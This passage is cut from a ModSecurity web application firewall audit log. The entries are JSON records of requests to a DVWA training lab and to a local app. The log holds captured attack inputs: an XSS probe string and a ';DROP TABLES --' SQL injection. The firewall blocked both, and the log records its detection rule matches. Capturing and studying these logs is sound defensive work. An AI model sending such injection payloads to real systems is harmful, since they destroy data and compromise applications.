\"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: content-length found within ARGS:mtxMessage: '';!--\\x22<XSS>=&{()}\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): XSS Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_s/\"] [unique_id \"WRc2fn8AAQEAAAkYuFUAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. detected XSS using libinjection. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf\"] [line \"56\"] [id \"941100\"] [rev \"2\"] [msg \"XSS Attack Detected via libinjection\"] [data \"Matched Data: content-length found within ARGS:mtxMessage: '';!--\\\\\\\\x22<XSS>=&{()}\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-xss\"] [tag \"OWASP_CRS/WEB_ATTACK/XSS\"] [tag \"WASCTC/WASC-8\"] [tag \"WASCTC/WASC-22\"] [tag \"OWASP_TOP_10/A3\"] [tag \"OWASP_AppSensor/IE1\"] [tag \"CAPEC-242\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_s/\"] [unique_id \"WRc2fn8AAQEAAAkYuFUAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_s/\"] [unique_id \"WRc2fn8AAQEAAAkYuFUAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.153] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): XSS Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/xss_s/\"] [unique_id \"WRc2fn8AAQEAAAkYuFUAAAAD\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":460,"p2":4250,"p3":0,"p4":0,"p5":211,"sr":19,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:38:37 --0400","transaction_id":"WRc2jX8AAQEAAAkZ0BsAAAAE","remote_address":"127.0.0.1","remote_port":42174,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 16:37:11 GMT","If-None-Match":"W/\"246-54f6a6f09244d\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:38:35 GMT","ETag":"\"26d-54f6a7404e88e\"","Accept-Ranges":"bytes","Content-Length":"621","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc2jX8AAQEAAAkZ0BsAAAAE\"]"],"stopwatch":{"p1":391,"p2":995,"p3":54,"p4":135,"p5":49,"sr":19,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:38:37 --0400","transaction_id":"WRc2jX8AAQEAAAkZ0BwAAAAE","remote_address":"127.0.0.1","remote_port":42174,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc2jX8AAQEAAAkZ0BwAAAAE\"]"],"stopwatch":{"p1":579,"p2":1227,"p3":66,"p4":335,"p5":66,"sr":32,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:38:37 --0400","transaction_id":"WRc2jX8AAQEAAAkZ0B0AAAAE","remote_address":"127.0.0.1","remote_port":42174,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc2jX8AAQEAAAkZ0B0AAAAE\"]"],"stopwatch":{"p1":867,"p2":1098,"p3":49,"p4":247,"p5":65,"sr":62,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:39:13 --0400","transaction_id":"WRc2sX8AAQEAAAkVV5AAAAAA","remote_address":"192.168.75.181","remote_port":46616,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_s/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2sX8AAQEAAAkVV5AAAAAA\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":462,"p2":1963,"p3":114,"p4":375,"p5":78,"sr":20,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:39:14 --0400","transaction_id":"WRc2sn8AAQEAAAkVV5EAAAAA","remote_address":"192.168.75.181","remote_port":46616,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/xss_s/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1456","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2sn8AAQEAAAkVV5EAAAAA\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":427,"p2":1409,"p3":98,"p4":377,"p5":67,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:39:35 --0400","transaction_id":"WRc2x38AAQEAAAmHBJoAAAAF","remote_address":"192.168.75.181","remote_port":46618,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27%3BDROP+TABLES+--+%27+&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2x38AAQEAAAmHBJoAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2x38AAQEAAAmHBJoAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2x38AAQEAAAmHBJoAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2x38AAQEAAAmHBJoAAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":496,"p2":2723,"p3":0,"p4":0,"p5":143,"sr":20,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
